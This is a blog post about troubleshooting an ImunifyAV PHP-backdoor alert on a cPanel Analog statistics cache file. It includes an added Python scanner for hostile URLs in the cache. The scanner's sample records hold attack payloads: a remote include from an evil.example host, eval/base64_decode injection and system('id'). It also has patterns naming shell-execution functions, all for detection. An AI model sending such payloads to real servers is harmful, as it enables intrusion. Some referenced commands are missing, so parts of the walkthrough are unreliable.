The virus alert message to start the day.
In August 2020, ImunifyAV reported that it found malware in a file on my website. Troubleshooting a virus alert from ImunifyAV became that day’s task. These are the steps I took to correct the problem.
I found this because I check my system logs for possible problems on a regular basis. That day I spotted a potential problem and investigated it.
The software versions involved.
The following are the impacted software packages and versions I am running in my environment.
- imunifyAV 4.9.6-8
- cPanel 88.0.13
- Analog 6.0
Where to find the logs and what it reported
To find the imunifyAV dashboard within cPanel, go to HOME >> Plugins >> ImunifyAV
Under the user tab ImunifyAV reports one threat and provides the account associated with the threat.
Under the Files tab it lists the infected file. In this case it reported the following:
- Scan Date: August 10, 2020 5:49 PM
- Username: $user
- File: /home/$user/tmp/analog/cache
- Reason: SMW-INJ-04278-php.bkdr-7
- Status: Infected
Decoding the imunifyAV Reason code and Info on the class of malware
To decode the imunifyAV reason codes, see the imunifyAV documentation. This malware alert decodes as follows:
- SMW: Server Malware
- INJ: Injection
- 04278: the ID number of the signature
- php.bkdr: the category and class of the malware (a PHP backdoor)
- 7: the version number of the signature
The virus flagged is a PHP Backdoor. If you are concerned you already have a PHP or WordPress backdoor, check out this Article on WPSec.
The flagged file and its use
The directory /home/$user/tmp/analog is where Analog keeps its statistics files, and the cache file is where Analog stores all of its accumulated statistics data.
If you look at the header of the file you will see the following:
CACHE type 5 produced by analog 6.0/Unix. Do not modify or delete!
This cache file can grow very large. For a discussion of deleting the file, see this post on the cPanel forums: http://forums.cpanel.net/f5/analog-stat … 12066.html
If you delete the file, Analog will simply recreate it. You will lose all the statistics gathered up to the time you delete it, but afterwards Analog will continue to collect statistics and save them to that file.
Web Log Analyzers on cPanel
cPanel provides three different web log analysis programs: AWStats, Analog Stats and Webalizer. Analog is not maintained the way the others are; its last major update was in December 2004. See Wikipedia: Analog (program) for more details.
The Analog Stats application
The analog configuration on a cPanel host can be found here.
For documentation for Analog – check out Analog GSP Readme.
If you don’t plan to use Analog, you can disable caching with the following setting in analog.cfg.
This disables it for all users on the host, so it must be done by the host admin.
Reading the analog cache file
To find out what triggered the virus alert, I looked into the contents of the cache file. The following is a rough translation of the record types within it. Record type 1 is the one of concern, because it holds the information passed to the web server in the URL.
- D Date range
- 1 File requested (the URL); field 14 is the file requested
- 2. Not used
- 3. Referer url
- 4. Browser info
- 5. Ip Address
- z appears to be date info
- c server response code 200,301, 302, 404, etc
To list all of the URLs, use the following command (grep -v 184 drops every line containing that string, grep "^1" keeps only type-1 records, and cut -f13 keeps their 13th tab-separated field). A review of cache.out showed that a potential virus payload had been included in a URL sent to the server.
grep -v 184 cache|grep "^1" |cut -f13|sort -n >cache.out
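As an added example (not code from the original post), the following Python script does what the record-type list and the grep/cut pipeline above do by hand: it parses a tab-separated cache, pulls the requested URL out of each type-1 record, URL-decodes it, and flags URLs that carry PHP backdoor or command-injection payloads. The cache layout, the URL field position (field 13, matching the cut -f13 above) and the sample records are assumptions constructed for the example; the indicator patterns are illustrative and are not ImunifyAV's SMW-INJ signatures.

```python
import re
from urllib.parse import unquote_plus

# Indicators of a PHP backdoor or code-injection attempt carried in a request URL.
# Illustrative patterns chosen for this example, not ImunifyAV's signatures.
INDICATORS = {
    "php_open_tag":   re.compile(r"<\?php", re.I),
    "eval":           re.compile(r"\beval\s*\(", re.I),
    "base64_decode":  re.compile(r"\bbase64_decode\s*\(", re.I),
    "shell_function": re.compile(r"\b(?:system|passthru|shell_exec|exec|popen|proc_open)\s*\(", re.I),
    "remote_include": re.compile(r"[?&][^&=]+=https?://", re.I),
}


def _rec(rtype, value):
    """Build one constructed cache record: type in field 1, value in field 13, a count in field 14."""
    return "\t".join([rtype] + ["0"] * 11 + [value, "1"])


# Constructed sample cache (not a real Analog capture). Assumed layout: tab-separated
# fields, record type in field 1, requested URL in field 13 of type-1 records.
# Only the header line is the one Analog 6.0 actually writes.
SAMPLE_CACHE = "\n".join([
    "CACHE type 5 produced by analog 6.0/Unix. Do not modify or delete!",
    "D\t20200801\t20200810",
    _rec("1", "/index.php"),
    _rec("1", "/wp-login.php"),
    _rec("1", "/index.php?page=http://evil.example/shell.txt"),
    _rec("1", "/?x=%3C%3Fphp%20eval(base64_decode(%22aGVsbG8%3D%22))%3B%3F%3E"),
    _rec("1", "/cgi-bin/test.cgi?cmd=system('id')"),
    _rec("1", "/?c=%253C%3Fphp%2520phpinfo()%3B"),   # double-encoded payload
    _rec("3", "http://evil.example/?q=eval(x)"),     # referer record: not a request, not scanned
    _rec("c", "404"),
])


def parse_records(cache_text):
    """Yield (record_type, fields) for each tab-separated record, skipping the header and blanks."""
    for line in cache_text.splitlines():
        if not line or line.startswith("CACHE "):
            continue
        fields = line.split("\t")
        yield fields[0], fields


def requested_urls(cache_text, url_field=13):
    """Return the requested URL from every type-1 record (url_field is 1-based, like cut -f)."""
    return [
        fields[url_field - 1]
        for rtype, fields in parse_records(cache_text)
        if rtype == "1" and len(fields) >= url_field
    ]


def decode_fully(url, max_rounds=3):
    """URL-decode repeatedly so double-encoded payloads (%253C -> %3C -> <) are exposed."""
    for _ in range(max_rounds):
        decoded = unquote_plus(url)
        if decoded == url:
            break
        url = decoded
    return url


def indicators_for(url):
    """Names of the indicators that match the decoded URL, in INDICATORS order."""
    decoded = decode_fully(url)
    return [name for name, rx in INDICATORS.items() if rx.search(decoded)]


def scan_cache(cache_text, url_field=13):
    """Return one hit per flagged request URL, in the order the records appear in the cache."""
    hits = []
    for url in requested_urls(cache_text, url_field):
        found = indicators_for(url)
        if found:
            hits.append({"url": url, "decoded": decode_fully(url), "indicators": found})
    return hits


if __name__ == "__main__":
    for hit in scan_cache(SAMPLE_CACHE):
        print(hit["decoded"], "->", ", ".join(hit["indicators"]))
```

To run it against a real file, replace SAMPLE_CACHE with the contents of /home/$user/tmp/analog/cache (the path from the alert). Decoding is repeated until the URL stops changing, so a double-encoded payload such as %253C%3Fphp is still caught. A hit only means the request was logged and persisted in the cache; it says nothing about whether the server executed anything, which is exactly the distinction that matters when a scanner flags a statistics file.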
Corrective Action Taken
In the end I felt comfortable that it was a non-threat. I cleared out the file using the following command. Analog will still produce reports, but only from the current logs and not from any cached data. Over time it will rebuild the cache with new data.
At the end of the day, troubleshooting a virus alert from ImunifyAV turned out to be a quick task.
An attacker had sent backdoor code in a URL. The attempt failed, but the request was recorded in the log statistics, and that stored copy of the payload is what the scanner matched. If it occurs again, I will simply disable Analog Stats and rely on Webalizer or AWStats.
My next task is to review the three Web Analyzers installed on the host and decide if I even need to keep Analog Stats.